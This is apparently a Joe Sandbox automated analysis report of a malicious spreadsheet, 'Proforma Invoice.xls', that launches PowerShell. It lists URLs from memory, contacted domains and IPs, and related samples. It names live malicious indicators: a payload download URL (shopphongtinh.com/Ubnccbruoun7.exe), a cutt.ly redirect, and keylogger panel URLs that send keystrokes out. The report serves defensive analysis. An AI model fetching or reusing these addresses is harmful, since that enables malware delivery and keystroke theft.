http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%Avira URL Cloudsafe
http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%Avira URL Cloudsafe
http://www.certifikat.dk/repository00%Avira URL Cloudsafe
http://www.chambersign.org10%URL Reputationsafe
http://www.chambersign.org10%URL Reputationsafe
http://www.chambersign.org10%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%Avira URL Cloudsafe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
http://ctldl.windows0%Avira URL Cloudsafe
http://repository.infonotary.com/cps/qcps.html0$0%Avira URL Cloudsafe
http://www.post.trust.ie/reposit/cps.html00%Avira URL Cloudsafe
http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
https://cutt.ly/ZhqUH1OPE0%Avira URL Cloudsafe
http://ocsp.infonotary.com/responder.cgi0V0%Avira URL Cloudsafe
http://www.sk.ee/cps/00%URL Reputationsafe
http://www.sk.ee/cps/00%URL Reputationsafe
http://www.sk.ee/cps/00%URL Reputationsafe
http://www.certicamara.com00%Avira URL Cloudsafe
http://www.globaltrust.info0=0%Avira URL Cloudsafe
https://cutt.ly/ZhqUH1O0%Avira URL Cloudsafe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%Avira URL Cloudsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe
http://www.ssc.lt/cps030%URL Reputationsafe
http://www.ssc.lt/cps030%URL Reputationsafe
http://www.ssc.lt/cps030%URL Reputationsafe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%Avira URL Cloudsafe
http://ocsp.pki.gva.es00%URL Reputationsafe
http://ocsp.pki.gva.es00%URL Reputationsafe
http://ocsp.pki.gva.es00%URL Reputationsafe
http://crl.oces.certifikat.dk/oces.crl00%Avira URL Cloudsafe
http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
http://www.dnie.es/dpc00%URL Reputationsafe
http://www.dnie.es/dpc00%URL Reputationsafe
http://www.dnie.es/dpc00%URL Reputationsafe
http://www.rootca.or.kr/rca/cps.html00%Avira URL Cloudsafe
http://www.trustcenter.de/guidelines00%Avira URL Cloudsafe
http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl00%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://www.globaltrust.info00%URL Reputationsafe
http://www.globaltrust.info00%URL Reputationsafe
http://www.globaltrust.info00%URL Reputationsafe
http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
https://www.catcert.net/verarrel0%URL Reputationsafe
https://www.catcert.net/verarrel0%URL Reputationsafe
https://www.catcert.net/verarrel0%URL Reputationsafe
http://www.disig.sk/ca0f0%URL Reputationsafe
http://www.disig.sk/ca0f0%URL Reputationsafe
http://www.disig.sk/ca0f0%URL Reputationsafe
https://shopphongtinh.comp0%Avira URL Cloudsafe
http://www.sk.ee/juur/crl/00%URL Reputationsafe
http://www.sk.ee/juur/crl/00%URL Reputationsafe
http://www.sk.ee/juur/crl/00%URL Reputationsafe
http://crl.chambersign.org/chambersignroot.crl00%URL Reputationsafe
http://crl.chambersign.org/chambersignroot.crl00%URL Reputationsafe
http://crl.chambersign.org/chambersignroot.crl00%URL Reputationsafe
http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
cutt.ly
104.22.1.232
truetrueunknown
shopphongtinh.com
202.92.6.10
truefalse
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0powershell.exe, 00000007.00000002.2125202164.000000001B83B000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://www.a-cert.at0Epowershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://www.certplus.com/CRL/class3.crl0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://www.e-me.lv/repository0powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://www.acabogacia.org/doc0powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://crl.chambersign.org/chambersroot.crl0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpfalse
      high
      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://www.certifikat.dk/repository0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://www.chambersign.org1powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      http://www.pkioverheid.nl/policies/root-policy0powershell.exe, 00000007.00000003.2112254528.000000001D155000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      http://repository.swisssign.com/0powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpfalse
        high
        https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlpowershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        http://ca.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        http://www.certplus.com/CRL/class3P.crl0powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        http://ctldl.windowspowershell.exe, 00000007.00000002.2127591509.000000001D1CD000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://repository.infonotary.com/cps/qcps.html0$powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.post.trust.ie/reposit/cps.html0powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.certplus.com/CRL/class2.crl0powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        http://www.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        https://cutt.ly/ZhqUH1OPEpowershell.exe, 00000007.00000002.2123429588.000000000360E000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://ocsp.infonotary.com/responder.cgi0Vpowershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.sk.ee/cps/0powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        http://www.certicamara.com0powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.globaltrust.info0=powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        low
        https://cutt.ly/ZhqUH1Opowershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmp, powershell.exe, 00000007.00000002.2123429588.000000000360E000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Epowershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://servername/isapibackend.dllpowershell.exe, 00000007.00000002.2127649611.000000001D2F0000.00000002.00000001.sdmpfalse
        • Avira URL Cloud: safe
        low
        http://www.ssc.lt/cps03powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        http://www.windows.com/pctv.powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmpfalse
          high
          http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://ocsp.pki.gva.es0powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://crl.oces.certifikat.dk/oces.crl0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://crl.ssc.lt/root-b/cacrl.crl0powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.certicamara.com/dpc/0Zpowershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmpfalse
            high
            http://crl.pki.wellsfargo.com/wsprca.crl0powershell.exe, 00000007.00000002.2125382538.000000001B8DC000.00000004.00000001.sdmpfalse
              high
              http://www.dnie.es/dpc0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.rootca.or.kr/rca/cps.html0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.trustcenter.de/guidelines0powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000007.00000002.2127038409.000000001CEF7000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.globaltrust.info0powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://certificates.starfieldtech.com/repository/1604powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmpfalse
                high
                http://www.certplus.com/CRL/class3TS.crl0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.entrust.net/CRL/Client1.crl0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
                  high
                  http://www.entrust.net/CRL/net1.crl0powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmpfalse
                    high
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000007.00000002.2117820779.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2153355940.0000000002330000.00000002.00000001.sdmpfalse
                      high
                      https://www.catcert.net/verarrelpowershell.exe, 00000007.00000002.2125516730.000000001B8F8000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.disig.sk/ca0fpowershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmp, powershell.exe, 00000009.00000002.2152554964.00000000002CE000.00000004.00000020.sdmpfalse
                        high
                        http://www.e-szigno.hu/RootCA.crlpowershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmpfalse
                          high
                          http://www.signatur.rtr.at/current.crl0powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmpfalse
                            high
                            https://shopphongtinh.comppowershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.sk.ee/juur/crl/0powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.chambersign.org/chambersignroot.crl0powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.xrampsecurity.com/XGCA.crl0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.quovadis.bm0powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.ssc.lt/root-a/cacrl.crl0powershell.exe, 00000007.00000002.2125382538.000000001B8DC000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.trustdst.com/certificates/policy/ACES-index.html0powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.firmaprofesional.com0powershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://cutt.ly/powershell.exe, 00000007.00000002.2123429588.000000000360E000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://www.netlock.net/docspowershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crlpowershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://shopphongtinh.compowershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.entrust.net/2048ca.crl0powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpfalse
                              high
                              http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmpfalse
                                high
                                http://cps.chambersign.org/cps/publicnotaryroot.html0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.e-trust.be/CPS/QNcertspowershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.certicamara.com/certicamaraca.crl0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmpfalse
                                    high
                                    http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://fedir.comsign.co.il/crl/ComSignCA.crl0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://ocsp.entrust.net03powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://cps.chambersign.org/cps/chambersroot.html0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.acabogacia.org0powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://cutt.lypowershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.litespeedtech.compowershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpfalse
                                      high
                                      https://ca.sia.it/seccli/repository/CPS0powershell.exe, 00000007.00000002.2125152617.000000001B800000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://crl.securetrust.com/SGCA.crl0powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://shopphongtinh.com/Ubnccbruoun7.exepowershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://crl.securetrust.com/STCA.crl0powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.icra.org/vocabulary/.powershell.exe, 00000007.00000002.2127038409.000000001CEF7000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.certicamara.com/certicamaraca.crl0;powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.e-szigno.hu/RootCA.crt0powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.quovadisglobal.com/cps0powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpfalse
                                            high
                                            http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0Lpowershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpfalse
                                              high
                                              http://investor.msn.com/powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.valicert.com/1powershell.exe, 00000007.00000003.2112206947.00000000003AE000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.e-szigno.hu/SZSZ/0powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.%s.comPApowershell.exe, 00000007.00000002.2117820779.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2153355940.0000000002330000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  low
                                                  http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0powershell.exe, 00000007.00000003.2112254528.000000001D155000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ocsp.quovadisoffshore.com0powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://ocsp.entrust.net0Dpowershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  202.92.6.10
                                                  unknownViet Nam
                                                  45899VNPT-AS-VNVNPTCorpVNfalse
                                                  104.22.1.232
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUStrue

                                                  General Information

                                                  Joe Sandbox Version:31.0.0 Red Diamond
                                                  Analysis ID:320373
                                                  Start date:19.11.2020
                                                  Start time:10:12:17
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 6m 31s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:Proforma Invoice.xls
                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                  Run name:Without Instrumentation
                                                  Number of analysed new started processes analysed:13
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal88.expl.evad.winXLS@13/11@2/2
                                                  EGA Information:Failed
                                                  HDC Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 5
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .xls
                                                  • Changed system and user locale, location and keyboard layout to French - France
                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                  • Attach to Office via COM
                                                  • Scroll down
                                                  • Close Viewer
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 205.185.216.42, 205.185.216.10
                                                  • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  10:12:50API Interceptor461x Sleep call for process: powershell.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  202.92.6.10Invoice.xlsmGet hashmaliciousBrowse
                                                  • shopphongtinh.com/client.exe
                                                  SA Covid-19 Funding Connection.xlsmGet hashmaliciousBrowse
                                                  • shopphongtinh.com/key/panel/base/post.php?type=keystrokes&machinename=530978&windowtitle=Program%20Manager&keystrokestyped=&machinetime=8:05%20PM
                                                  invoice.exeGet hashmaliciousBrowse
                                                  • shopphongtinh.com/key/panel/base/post.php?type=keystrokes&machinename=960781&windowtitle=Program%20Manager&keystrokestyped=&machinetime=8:06%20PM
                                                  http://thungcartonvinatc.com/MxZhe-bBdwsbFVz36TAJH_YObpULtA-IIGet hashmaliciousBrowse
                                                  • thungcartonvinatc.com/MxZhe-bBdwsbFVz36TAJH_YObpULtA-II/
                                                  104.22.1.232http://cutt.ly/Get hashmaliciousBrowse
                                                  • cutt.ly/

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  cutt.lyProforma Invoice.xlsGet hashmaliciousBrowse
                                                  • 104.22.0.232
                                                  Shipping Invoice.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  Shipping Invoice.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  Shipping Invoice.xlsGet hashmaliciousBrowse
                                                  • 104.22.0.232
                                                  wHrBhrpp3q.csvGet hashmaliciousBrowse
                                                  • 172.67.8.238
                                                  wHrBhrpp3q.csvGet hashmaliciousBrowse
                                                  • 172.67.8.238
                                                  wHrBhrpp3q.csvGet hashmaliciousBrowse
                                                  • 172.67.8.238
                                                  SecuriteInfo.com.Exploit.Siggen2.64979.12090.xlsGet hashmaliciousBrowse
                                                  • 104.22.1.232
                                                  SecuriteInfo.com.Exploit.Siggen2.64979.3440.xlsGet hashmaliciousBrowse
                                                  • 104.22.0.232
